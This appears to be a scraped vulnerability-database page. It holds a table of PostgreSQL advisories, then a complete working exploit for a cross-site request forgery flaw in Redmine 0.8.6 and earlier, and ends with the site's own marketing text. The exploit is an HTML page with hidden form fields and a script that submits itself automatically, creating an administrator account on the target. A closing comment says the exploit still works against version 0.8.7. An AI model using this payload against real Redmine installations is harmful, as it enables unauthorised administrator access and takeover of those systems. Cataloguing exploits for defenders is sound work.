| Reporter | Title | Published | Views | Family All 95 |
|---|---|---|---|---|
| PostgreSQL < 8.4.2 / 8.3.9 / 8.2.15 / 8.1.19 / 8.0.23 / 7.4.27 Multiple Vulnerabilities | 15 Dec 200900:00 | – | nessus | |
| CentOS 3 : postgresql (CESA-2010:0427) | 24 May 201000:00 | – | nessus | |
| CentOS 4 : postgresql (CESA-2010:0428) | 24 May 201000:00 | – | nessus | |
| CentOS 5 : postgresql (CESA-2010:0429) | 1 Jun 201000:00 | – | nessus | |
| Debian DSA-1964-1 : postgresql-7.4, postgresql-8.1, postgresql-8.3 - several vulnerabilities | 24 Feb 201000:00 | – | nessus | |
| Fedora 11 : postgresql-8.3.9-1.fc11 (2009-13363) | 18 Dec 200900:00 | – | nessus | |
| Fedora 12 : postgresql-8.4.2-1.fc12 (2009-13381) | 18 Dec 200900:00 | – | nessus | |
| FreeBSD : postgresql -- multiple vulnerabilities (e7bc5600-eaa0-11de-bd9c-00215c6a37bb) | 17 Dec 200900:00 | – | nessus | |
| GLSA-201110-22 : PostgreSQL: Multiple vulnerabilities | 25 Oct 201100:00 | – | nessus | |
| Mandriva Linux Security Advisory : postgresql (MDVSA-2009:333) | 16 Dec 200900:00 | – | nessus |
/**
* Redmine &lt;= 0.8.6 CSRF Add Admin User Exploit
* Discovered by: p0deje (http://p0deje.blogspot.com)
* Application: http://www.redmine.org/wiki/redmine/Download
* SA: http://www.redmine.org/news/30
* Date: 13.11.2009
* Versions affected: &lt;= 0.8.6
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/
&lt;html&gt;
&lt;body&gt;
&lt;form method=POST action=&quot;http://www.example.com/users/new&quot;&gt;
&lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;25&quot; name=&quot;user[login]&quot; id=&quot;user_login&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[firstname]&quot; id=&quot;user_firstname&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;hacker&quot; size=&quot;30&quot; name=&quot;user[lastname]&quot; id=&quot;user_lastname&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;text&quot; value=&quot;[email protected]&quot; size=&quot;30&quot; name=&quot;user[mail]&quot; id=&quot;user_mail&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password&quot; id=&quot;password&quot; value=&quot;hacker&quot; /&gt;
&lt;input style=&quot;display: none&quot; type=&quot;password&quot; size=&quot;25&quot; name=&quot;password_confirmation&quot; id=&quot;password_confirmation&quot; value=&quot;hacker&quot; /&gt;
&lt;input style=&quot;display: none&quot; type=&quot;checkbox&quot; value=&quot;1&quot; name=&quot;user[admin]&quot; id=&quot;user_admin&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;user[admin]&quot;/&gt;
&lt;input style=&quot;display: none&quot; type=&quot;submit&quot; value=&quot;Create&quot; id=&quot;commit&quot; name=&quot;commit&quot; /&gt;
&lt;/form&gt;
&lt;script&gt;document.getElementById(&quot;commit&quot;).click();&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
/**
* P.S. Actually, this vulnerability wasn&#039;t fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
* Thus, you can add POST data with token of any user and exploit will be working again
*/
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation